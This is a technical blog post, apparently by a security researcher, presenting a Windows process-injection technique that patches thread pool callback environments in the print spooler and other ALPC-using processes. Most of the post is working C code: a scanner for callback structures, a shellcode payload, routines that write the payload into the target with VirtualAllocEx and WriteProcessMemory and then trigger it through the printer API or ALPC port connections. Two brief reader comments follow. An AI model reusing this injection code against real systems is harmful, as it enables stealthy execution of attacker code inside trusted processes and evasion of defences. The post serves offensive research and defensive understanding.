Introduction
Every application running on the windows operating system has a thread pool or a “worker factory” and this internal mechanism allows an application to offload management of threads typically used for asynchronous operations. The automation of thread management facilitates the support of callback functions in response to I/O events or a timer expiring. Imagine you have a process that needs to send and receive data over the network. Do we want the application to wait indefinitely to receive something from the network? ..or do we want to perform other tasks simultaneously? Thread pooling enables more efficient management of threads and specifically asynchronous callback procedures. These functions can be patched in memory and this allows one to inadvertently execute code without the creation of a new thread. Figure 1 shows notepad running under the spooler process after being patched with shellcode and invoked using print spooler API.

Figure 1. Notepad running under spooler process.
Finding Callback Environments
Callback functions are stored in mostly opaque/undocumented structures that I haven’t taken the time to fully document here because my main objective is to perform code injection. For the print spooler, we’re only interested in the TP_ALPC structure that is used by TppAlpcpExecuteCallback located in NTDLL.dll. This function dispatches printer requests via the LPC port to LrpcIoComplete located in RPCRT4.dll. TP_ALPC contains a TP_CALLBACK_ENVIRON structure or what I’ll refer to as CBE from now on. CBEs can be found in both the stack and heap memory space of a process, so the virtual memory we need to scan has the following memory attributes.
- State is MEM_COMMIT
- Type is MEM_PRIVATE
- Protect is PAGE_READWRITE
The data we’re looking for can be interepreted using the following structure.
typedef struct _TP_CALLBACK_ENVIRON_V3 { TP_VERSION Version; PTP_POOL Pool; PTP_CLEANUP_GROUP CleanupGroup; PTP_CLEANUP_GROUP_CANCEL_CALLBACK CleanupGroupCancelCallback; PVOID RaceDll; struct _ACTIVATION_CONTEXT *ActivationContext; PTP_SIMPLE_CALLBACK FinalizationCallback; union { DWORD Flags; struct { DWORD LongFunction : 1; DWORD Persistent : 1; DWORD Private : 30; } s; } u; TP_CALLBACK_PRIORITY CallbackPriority; DWORD Size; } TP_CALLBACK_ENVIRON_V3;
However, in memory, two additional pointers are required. One is the actual callback function and the other is a callback parameter. It is likely a separate structure that also appears to be undocumented.
00000000`011fbd08 00000000`00000001 ; Version 00000000`011fbd10 00007ffc`b50c0680 ntdll!TppAlpcpCleanupGroupMemberVFuncs ; Pool 00000000`011fbd18 00000000`00000000 ; CleanupGroup 00000000`011fbd20 00000000`00000000 ; CleanupGroupCancelCallback 00000000`011fbd28 00000000`00000000 ; RaceDll 00000000`011fbd30 00000000`011fbd30 ; ActivationContext 00000000`011fbd38 00000000`011fbd30 ; FinalizationCallback 00000000`011fbd40 00000000`00000000 ; Flags 00000000`011fbd48 00000000`00000000 ; CallbackPriority 00000000`011fbd50 00000000`00000000 ; Size 00000000`011fbd58 00007ffc`b38a9240 RPCRT4!LrpcIoComplete ; Callback 00000000`011fbd60 00000000`0121c948 ; CallbackParameter
The following structure is used to find valid CBEs instead of the original from the SDK.
// this structure is derived from TP_CALLBACK_ENVIRON_V3, // but also includes two additional values. one to hold // the callback function and the other is a callback parameter typedef struct _TP_CALLBACK_ENVIRON_X { ULONG_PTR Version; ULONG_PTR Pool; ULONG_PTR CleanupGroup; ULONG_PTR CleanupGroupCancelCallback; ULONG_PTR RaceDll; ULONG_PTR ActivationContext; ULONG_PTR FinalizationCallback; ULONG_PTR Flags; ULONG_PTR CallbackPriority; ULONG_PTR Size; ULONG_PTR Callback; ULONG_PTR CallbackParameter; } TP_CALLBACK_ENVIRON_X;
We read blocks of memory equivalent to the size of TP_CALLBACK_ENVIRON_X and validate them with some simple checks. The following function can determine if the memory looks like a valid CBE.
BOOL IsValidCBE(HANDLE hProcess, PTP_CALLBACK_ENVIRONX cbe) { MEMORY_BASIC_INFORMATION mbi; SIZE_T res; // invalid version? if(cbe->Version > 5) return FALSE; // these values shouldn't be empty if(cbe->Pool == 0 || cbe->FinalizationCallback == 0) return FALSE; // these values should be equal if ((LPVOID)cbe->FinalizationCallback != (LPVOID)cbe->ActivationContext) return FALSE; // priority shouldn't exceed TP_CALLBACK_PRIORITY_INVALID if(cbe->CallbackPriority > TP_CALLBACK_PRIORITY_INVALID) return FALSE; // the pool functions should originate from read-only memory res = VirtualQueryEx(hProcess, (LPVOID)cbe->Pool, &mbi, sizeof(mbi)); if (res != sizeof(mbi)) return FALSE; if (!(mbi.Protect & PAGE_READONLY)) return FALSE; // the callback function should originate from read+execute memory res = VirtualQueryEx(hProcess, (LPCVOID)cbe->Callback, &mbi, sizeof(mbi)); if (res != sizeof(mbi)) return FALSE; return (mbi.Protect & PAGE_EXECUTE_READ); }
Payload
The payload is written in C and simply runs notepad. Calculator isn’t used because it’s a metro application on Windows 10 that has specific requirements to work. The TP_ALPC structure passed to LrpcIoComplete isn’t documented, but does include a structure similar to TP_CALLBACK_ENVIRON_V3. Once our payload is executed, we first restore the original Callback and CallbackParameter values. This is required because once we call WinExec, it will trigger another call to LrpcIoComplete, entering into an infinite loop before crashing the process. After restoration, call WinExec, followed by LrpcIoComplete using original values.
#ifdef TPOOL // Thread Pool Callback // the wrong types are used here, but it doesn't really matter typedef struct _TP_ALPC { // ALPC callback info ULONG_PTR AlpcPool; ULONG_PTR Unknown1; ULONG_PTR Unknown2; ULONG_PTR Unknown3; ULONG_PTR Unknown4; ULONG_PTR AlpcActivationContext; ULONG_PTR AlpcFinalizationCallback; ULONG_PTR AlpcCallback; ULONG_PTR Unknown5; // callback environment ULONG_PTR Version; ULONG_PTR Pool; ULONG_PTR CleanupGroup; ULONG_PTR CleanupGroupCancelCallback; ULONG_PTR RaceDll; ULONG_PTR ActivationContext; ULONG_PTR FinalizationCallback; ULONG_PTR Flags; ULONG_PTR CallbackPriority; ULONG_PTR Size; ULONG_PTR Callback; ULONG_PTR CallbackParameter; } TP_ALPC; typedef struct _tp_param_t { ULONG_PTR Callback; ULONG_PTR CallbackParameter; } tp_param; typedef TP_ALPC TP_ALPC, *PTP_ALPC; typedef void (WINAPI *LrpcIoComplete_t)(LPVOID, LPVOID, LPVOID, LPVOID); VOID TpCallBack(LPVOID tp_callback_instance, LPVOID param, PTP_ALPC alpc, LPVOID unknown2) #endif { WinExec_t pWinExec; DWORD szWinExec[2], szNotepad[3]; #ifdef TPOOL LrpcIoComplete_t pLrpcIoComplete; tp_param *tp=(tp_param*)param; ULONG_PTR op; // param should contain pointer to tp_param pLrpcIoComplete = (LrpcIoComplete_t)tp->Callback; op = tp->CallbackParameter; // restore original values // this will indicate we executed ok, // but is also required before the call to WinExec alpc->Callback = tp->Callback; alpc->CallbackParameter = tp->CallbackParameter; #endif // now call WinExec to start notepad szWinExec[0] = *(DWORD*)"WinE"; szWinExec[1] = *(DWORD*)"xec\0"; szNotepad[0] = *(DWORD*)"note"; szNotepad[1] = *(DWORD*)"pad\0"; pWinExec = (WinExec_t)xGetProcAddress(szWinExec); if(pWinExec != NULL) { pWinExec((LPSTR)szNotepad, SW_SHOW); } // finally, pass the original message on.. #ifdef TPOOL pLrpcIoComplete(tp_callback_instance, (LPVOID)alpc->CallbackParameter, alpc, unknown2); #endif #ifndef TPOOL return 0; #endif }
Deploying and Triggering Payload
Here, we use a conventional method of sharing the payload/shellcode with spooler process. This consists of:
- OpenProcess(“spoolsv.exe”)
- VirtualAllocEx(payloadSize, PAGE_EXECUTE_READWRITE)
- WriteProcessMemory(payload, payloadSize)
Once we have a valid CBE, we patch the Callback pointer with address to our payload and try invoke it using the print spooler API. Although OpenPrinter is used in the following code, you could probably use any other API that involves interaction with the print spooler service. At the abstraction layer, interaction with the print spooler service is conducted over Local Procedure Call (LPC) which is an interprocess communication. Over the network uses Remote Procedure Call (RPC) but we’re obviously not injecting over network. 😉
// try inject and run payload in remote process using CBE BOOL inject(HANDLE hp, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) { LPVOID cs = NULL; BOOL bStatus = FALSE; TP_CALLBACK_ENVIRONX cpy; // local copy of cbe SIZE_T wr; HANDLE phPrinter = NULL; tp_param tp; // allocate memory in remote for payload and callback parameter cs = VirtualAllocEx(hp, NULL, payloadSize + sizeof(tp_param), MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (cs != NULL) { // write payload to remote process WriteProcessMemory(hp, cs, payload, payloadSize, &wr); // backup CBE CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX)); // copy original callback address and parameter tp.Callback = cpy.Callback; tp.CallbackParameter = cpy.CallbackParameter; // write callback+parameter to remote process WriteProcessMemory(hp, (LPBYTE)cs + payloadSize, &tp, sizeof(tp), &wr); // update original callback with address of payload and parameter cpy.Callback = (ULONG_PTR)cs; cpy.CallbackParameter = (ULONG_PTR)(LPBYTE)cs + payloadSize; // update CBE in remote process WriteProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr); // trigger execution of payload if(OpenPrinter(NULL, &phPrinter, NULL)) { ClosePrinter(phPrinter); } // read back the CBE ReadProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr); // restore the original cbe WriteProcessMemory(hp, ds, cbe, sizeof(cpy), &wr); // if callback pointer is the original, we succeeded. bStatus = (cpy.Callback == cbe->Callback); // release memory for payload VirtualFreeEx(hp, cs, payloadSize, MEM_RELEASE); } return bStatus; }
Figure 2 shows an attempt to inject code by four different DLL before finally succeeding with RPCRT4.dll.

Figure 2. Code injection via Callback Environment
The code shown here is only a proof of concept and could be refined to be more elegant or be applied to other processes that use thread pooling. I only use the print spooler here, but of course other processes use thread pooling and could also be leveraged for code injection. Sources can be found here.
Update
To use the same method of injection against almost any other process that uses ALPC, you can connect directly to the ALPC port.
/** Get a list of ALPC ports with names */ DWORD GetALPCPorts(process_info *pi) { ULONG len=0, total=0; NTSTATUS status; LPVOID list=NULL; DWORD i; HANDLE hObj; PSYSTEM_HANDLE_INFORMATION hl; POBJECT_NAME_INFORMATION objName; pi->ports.clear(); // get a list of handles for the local system for(len=MAX_BUFSIZ;;len+=MAX_BUFSIZ) { list = xmalloc(len); status = NtQuerySystemInformation( SystemHandleInformation, list, len, &total); // break from loop if ok if(NT_SUCCESS(status)) break; // free list and continue xfree(list); } hl = (PSYSTEM_HANDLE_INFORMATION)list; objName = (POBJECT_NAME_INFORMATION)xmalloc(8192); // for each handle for(i=0; i<hl->NumberOfHandles; i++) { // skip if process ids don't match if(hl->Handles[i].UniqueProcessId != pi->pid) continue; // skip if the type isn't an ALPC port // note this value might be different on other systems. // this was tested on 64-bit Windows 10 if(hl->Handles[i].ObjectTypeIndex != 45) continue; // duplicate the handle object status = NtDuplicateObject( pi->hp, (HANDLE)hl->Handles[i].HandleValue, GetCurrentProcess(), &hObj, 0, 0, 0); // continue with next entry if we failed if(!NT_SUCCESS(status)) continue; // try query the name status = NtQueryObject(hObj, ObjectNameInformation, objName, 8192, NULL); // got it okay? if(NT_SUCCESS(status) && objName->Name.Buffer!=NULL) { // save to list pi->ports.push_back(objName->Name.Buffer); } // close handle object NtClose(hObj); } // free list of handles xfree(objName); xfree(list); return pi->ports.size(); }
Connecting to ALPC port
// connect to ALPC port BOOL ALPC_Connect(std::wstring path) { SECURITY_QUALITY_OF_SERVICE ss; NTSTATUS status; UNICODE_STRING server; ULONG MsgLen=0; HANDLE h; ZeroMemory(&ss, sizeof(ss)); ss.Length = sizeof(ss); ss.ImpersonationLevel = SecurityImpersonation; ss.EffectiveOnly = FALSE; ss.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING; RtlInitUnicodeString(&server, path.c_str()); status = NtConnectPort(&h, &server, &ss, NULL, NULL, (PULONG)&MsgLen, NULL, NULL); NtClose(h); return NT_SUCCESS(status); }
Deploying/Triggering
Same as before except we have to try multiple ALPC ports instead of just using print spooler API.
// try inject and run payload in remote process using CBE BOOL ALPC_deploy(process_info *pi, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) { LPVOID cs = NULL; BOOL bInject = FALSE; TP_CALLBACK_ENVIRONX cpy; // local copy of cbe SIZE_T wr; tp_param tp; DWORD i; // allocate memory in remote for payload and callback parameter cs = VirtualAllocEx(pi->hp, NULL, pi->payloadSize + sizeof(tp_param), MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (cs != NULL) { // write payload to remote process WriteProcessMemory(pi->hp, cs, pi->payload, pi->payloadSize, &wr); // backup CBE CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX)); // copy original callback address and parameter tp.Callback = cpy.Callback; tp.CallbackParameter = cpy.CallbackParameter; // write callback+parameter to remote process WriteProcessMemory(pi->hp, (LPBYTE)cs + pi->payloadSize, &tp, sizeof(tp), &wr); // update original callback with address of payload and parameter cpy.Callback = (ULONG_PTR)cs; cpy.CallbackParameter = (ULONG_PTR)(LPBYTE)cs + pi->payloadSize; // update CBE in remote process WriteProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr); // trigger execution of payload for(i=0;i<pi->ports.size(); i++) { ALPC_Connect(pi->ports[i]); // read back the CBE ReadProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr); // if callback pointer is the original, we succeeded. bInject = (cpy.Callback == cbe->Callback); if(bInject) break; } // restore the original cbe WriteProcessMemory(pi->hp, ds, cbe, sizeof(cpy), &wr); // release memory for payload VirtualFreeEx(pi->hp, cs, pi->payloadSize+sizeof(tp), MEM_RELEASE); } return bInject; }
I run cmd with administrator but I can’t have “WARNING: This requires elevated privileges”.
LikeLike
Great job!
LikeLike